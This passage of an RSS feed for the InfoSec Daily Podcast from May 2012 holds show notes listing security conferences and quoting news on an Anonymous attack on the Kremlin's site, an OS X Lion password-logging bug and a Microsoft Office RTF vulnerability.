DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
	http://hack3rcon.org/ 
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Stories
&#160;

&#160;
DerbyCon &#8220;Dropping the Deuce&#8221; courtesy of @jx666jx
&#160;
Source: &#160;http://www.tgdaily.com/security-features/63303-anonymous-takes-on-putins-russian-kremlin
Cyber activists associated with the Anonymous collective temporarily downed President Vladimir Putin&#39;s web site on Wednesday.  
The activists said they were protesting the controversial renewal of Putin&#39;s presidential term for yet another six years, which has sparked a wave of demonstrations in Moscow&#39;s city streets. 
The Kremlin&#39;s Internet security division responded to the above-mentioned pwnage by telling Reuters: &#34;All the relevant departments are taking the necessary measures to counteract (such) attacks. 
&#34;This is routine work. There is always some external influence. Today we are witnessing a splash of activity (by the attackers) &#8230; (But) they failed to achieve their goal.&#34;
In other Anonymous related news, the Pirate Bay has gone on record as criticizing Anonymous for taking down the Virgin Media website over its blocking of the Pirate Bay file sharing site, as per a recent order from the U.K. High Court .
&#34;We do NOT encourage these actions. We believe in the open and free Internets, where anyone can express their views. Even if we strongly disagree with them and even if they hate us,&#34; The Pirate Bay wrote on its Facebook page.  
But @AnonAteam defended its decision to target the Bay. 
&#34;The attacks are not simply about facilitating access to the Pirate Bay website but to stop the type of order used to block your website being used as a precedent for further censorship on the Internet,&#34; AnonAteam wrote on Tumblr.
&#34;The entire reason for the protest is to protect freedom of expression from being blocked without any form of judicial process. ISPs are the gateways to democracy in this technology age, to censor access to websites with such an abuse of the legal process, outside parliament our a Humans Right court is unlaw and an abuse of power.&#34;
&#8230;
Source: &#160;http://reports.informationweek.com/abstract/21/8815/Security/research-2012-strategic-security-survey.html
More than 900 IT and security professionals responded to InformationWeek&#8217;s 2012 Strategic Security Survey. Our results cover a variety of areas critical to information ris[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 665 &#8211;  OS X Update, Dangerous RTF’s, UNCC, DigiNotar, and MLT Arrest</title>
		<link>http://www.isdpodcast.com/episode-665-os-x-update-dangerous-rtfs-uncc-diginotar-and-mlt-arrest</link>
		<comments>http://www.isdpodcast.com/episode-665-os-x-update-dangerous-rtfs-uncc-diginotar-and-mlt-arrest#comments</comments>
		<pubDate>Fri, 11 May 2012 00:36:24 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3925</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 665 for May 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012&#160;&#160;&#160; Where: Veasey Memorial Park, Groveland, MA http://granitesec.org &#160; AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.4553887860690462" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 665 for May 10, 2012. &nbsp;</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;May 19, 2012&nbsp;&nbsp;&nbsp; <br class="kix-line-break" /><br />
	Where: Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /><br />
	</span><a href="http://granitesec.org"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://granitesec.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon^3</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 19-21, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Charleston, WV <br class="kix-line-break" /><br />
	</span><a href="http://hack3rcon.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hack3rcon.org/</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p><span style="background-color: transparent; text-decoration: underline; color: rgb(0, 0, 0); font-family: Arial; font-size: 13px; font-weight: bold; ">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/security/apple-releases-os-x-lion-1074-fixes-filevault-password-bug/12046"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/apple-releases-os-x-lion-1074-fixes-filevault-password-bug/12046</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple today released the OS X Lion v10.7.4 update, which among other things fixes the FileVault password bug. I broke the news about this security vulnerability over the weekend (see Apple security blunder exposes Lion login passwords in clear text). Here&rsquo;s the introduction:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An Apple programmer, apparently by accident, left a debug flag in the most recent version of the Mac OS X operating system. In specific configurations, applying OS X Lion update 10.7.3 turns on a system-wide debug log file that contains the login passwords of every user who has logged in since the update was applied. The passwords are stored in clear text.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anyone who used FileVault encryption on their Mac prior to Lion, upgraded to Lion, but kept the folders encrypted using the legacy version of FileVault is vulnerable. FileVault 2 (whole disk encryption) is unaffected.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here are the details of Apple&rsquo;s fix:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Login Window</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Impact: Remote admins and persons with physical access to the system may obtain account information</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Description: An issue existed in the handling of network account logins. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. This issue only affects systems running OS X Lion v10.7.3 with users of Legacy File Vault and/or networked home directories. See http://support.apple.com/kb/TS4272 for more information about how to securely remove any remaining records.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The issue was noted by an Apple user almost three months ago on the Apple Support Communities forum, but nobody got back to him. When security researcher David Emery discovered it as well and posted his findings to the Cryptome mailing list, and then I wrote my report for ZDNet, the story blew up. Apple never got back to my request for comment. Still, the important thing is that the issue has been fixed. In my conclusion, I also wrote this:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple needs to fix this issue as soon as possible. Even when a patch is made available, it will be impossible for the company to ensure the log file has been deleted, especially given all the places it may have been backed up. This means your password could still be out there even after you update, so after you do, make sure to change it.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So, patching is not enough. Make sure to change your passwords as well.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FileVault bug aside, here&rsquo;s the OS X 10.7.4 changelog:</span></p>
<ul style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Resolve an issue in which the &ldquo;Reopen windows when logging back in&rdquo; setting is always enabled.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Improve compatibility with certain British third-party USB keyboards.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Addresses permission issues that may be caused if you use the Get Info inspector function &ldquo;Apply to enclosed items&hellip;&rdquo; on your home directory. For more information, see</span><a href="http://support.apple.com/kb/TS4040"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> TS4040</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Improve Internet sharing of PPPoE connections.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Improve using a proxy auto-configuration (PAC) file.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Address an issue that may prevent files from being saved to an SMB server.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Improve printing to an SMB print queue.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Improve performance when connecting to a WebDAV server.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Enable automatic login for NIS accounts.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Include RAW image compatibility for additional digital cameras.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Improve the reliability of binding and logging into Active Directory accounts.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The OS X Lion v10.7.4 Update includes Safari 5.1.6, which contains stability improvements.</span></p>
</li>
</ul>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://nakedsecurity.sophos.com/2012/05/09/what-the-rtf-mac-and-windows-users-at-risk-from-boobytrapped-documents/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/05/09/what-the-rtf-mac-and-windows-users-at-risk-from-boobytrapped-documents/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the mid-1990s, the emergence of Word macro viruses &#8211; capable of infecting both Windows PCs and Apple Macs via Word documents &#8211; it was common practice to recommend users avoid sharing .DOC files and use Rich Text Format (.RTF) files instead.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The reasoning was that Rich Text Format didn&#39;t support the macro language that Microsoft had embedded inside .DOC files, and so it was a much safer way to share information in the office.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest batch of security bulletins issued by Microsoft, however, underline the importance of not thinking that any security advice should be written permanently in stone.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has</span><a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-029"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> warned</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Windows and Mac users that they could be at risk from boobytrapped RTF files if they leave their copies of Microsoft Office unpatched:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This security update resolves a privately reported vulnerability in Microsoft Office. The vulnerability could allow remote code execution if a user opens a specially crafted RTF file. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In shorthand that means a malicious attacker could send you a poisoned RTF file, and the simple act of you opening it in MS Word on a Windows or Mac computer could allow them to run malicious code. Potentially, for instance, they could open a backdoor that could allow them to gain remote access to your files or install further malware.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
